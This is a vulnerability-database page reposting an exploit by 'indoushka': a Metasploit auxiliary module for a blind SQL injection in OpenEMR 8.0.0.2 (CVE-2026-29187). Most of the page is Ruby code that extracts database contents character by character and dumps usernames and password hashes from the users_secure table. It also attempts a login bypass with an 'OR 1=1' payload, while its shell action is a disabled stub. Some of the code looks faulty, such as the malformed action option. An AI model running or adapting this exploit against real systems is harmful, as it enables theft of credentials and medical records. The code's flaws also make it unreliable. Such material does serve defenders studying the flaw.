Vulners
Lucene search
๐ OpenEMR 8.0.0.2 SQL Injection
๐๏ธย 20 Apr 2026ย 00:00:00Reported byย indoushkaTypeย 
ย packetstorm๐ย packetstorm.news๐ย 80ย Views
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2026-29187 | 25 Mar 202622:24 | โ | attackerkb |
 | CVE-2026-29187 | 25 Mar 202623:20 | โ | circl |
 | OpenEMR SQLๆณจๅ ฅๆผๆด | 25 Mar 202600:00 | โ | cnnvd |
 | CVE-2026-29187 | 25 Mar 202622:24 | โ | cve |
 | CVE-2026-29187 OpenEMR Vulnerable to Authenticated Blind Boolean-Based SQL Injection in new_search_popup.php | 25 Mar 202622:24 | โ | cvelist |
 | EUVD-2026-16008 | 25 Mar 202622:24 | โ | euvd |
 | CVE-2026-29187 | 25 Mar 202623:17 | โ | nvd |
 | CVE-2026-29187 OpenEMR Vulnerable to Authenticated Blind Boolean-Based SQL Injection in new_search_popup.php | 25 Mar 202622:24 | โ | osv |
| ๐ OpenEMR 8.0.0.2 SQL Injection | 26 Mar 202600:00 | โ | packetstorm |
 | PT-2026-28135 | 25 Mar 202600:00 | โ | ptsecurity |
10
==================================================================================================================================
| # Title : OpenEMR 8.0.0.2 Exploitation Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.open-emr.org/wiki/index.php/OpenEMR_Downloads |
==================================================================================================================================
[+] Summary : This Metasploit auxiliary module targets a potential SQL Injection vulnerability in an OpenEMR installation (CVE-2026-29187).
It is designed for controlled security assessment and supports multiple exploitation and enumeration actions.
[+] POC :
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenEMR CVE-2026-29187 SQL Injection Exploit ',
'Description' => 'OpenEMR 8.0.0.2 Exploitation Tool',
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [['CVE', '2026-29187']]
))
register_options([
Opt::RPORT(443),
OptBool.new('SSL', [true, 'SSL', true]),
OptString.new('TARGETURI', [true, 'Path', '/openemr/']),
OptInt.new('TIMEOUT', [true, 'Timeout', 10]),
OptEnum.new('ACTION', [
true,
'Action',
'DUMP_USERS',
'DUMP_SCHEMA',
'AUTH_BYPASS',
'GET_SHELL'
])
])
@results = []
end
def uri(path)
normalize_uri(datastore['TARGETURI'], path)
end
def inject_sql(payload)
res = send_request_cgi({
'method' => 'GET',
'uri' => uri('interface/new/new_search_popup.php'),
'vars_get' => { "mf_(#{payload})" => '1' },
'timeout' => datastore['TIMEOUT']
})
return false unless res
res.body.to_s.include?('SQL') || res.body.to_s.include?('error')
rescue
false
end
def extract_data(query)
result = ""
(1..50).each do |i|
(32..126).each do |c|
payload = "(SELECT IF(ASCII(SUBSTRING((#{query}),#{i},1))=#{c},'1','0'))"
if inject_sql(payload)
result << c.chr
break
end
end
end
result.empty? ? nil : result
end
def run
print_status("Starting OpenEMR SQLi module on #{rhost}")
case datastore['ACTION']
when 'DUMP_USERS'
dump_users
when 'DUMP_SCHEMA'
dump_schema
when 'AUTH_BYPASS'
auth_bypass
when 'GET_SHELL'
get_shell
end
end
def dump_users
print_status("Dumping users...")
count = extract_data("SELECT COUNT(*) FROM users_secure").to_i
return print_error("No users found") if count <= 0
(0...count).each do |i|
user = extract_data("SELECT username FROM users_secure LIMIT #{i},1")
pass = extract_data("SELECT password FROM users_secure LIMIT #{i},1")
print_good("USER: #{user} PASS: #{pass}")
end
end
def auth_bypass
res = send_request_cgi({
'method' => 'POST',
'uri' => uri('interface/main/main_screen.php'),
'vars_post' => {
'authUser' => "' OR 1=1 --",
'clearPass' => 'x'
}
})
if res && (res.code == 302 || res.body.to_s !~ /login/i)
print_good("Auth bypass success")
else
print_error("Failed")
end
end
def get_shell
print_status("Shell method not safe in fixed version (disabled)")
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Apr 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.18.1 - 8.8
EPSS0.00473
SSVC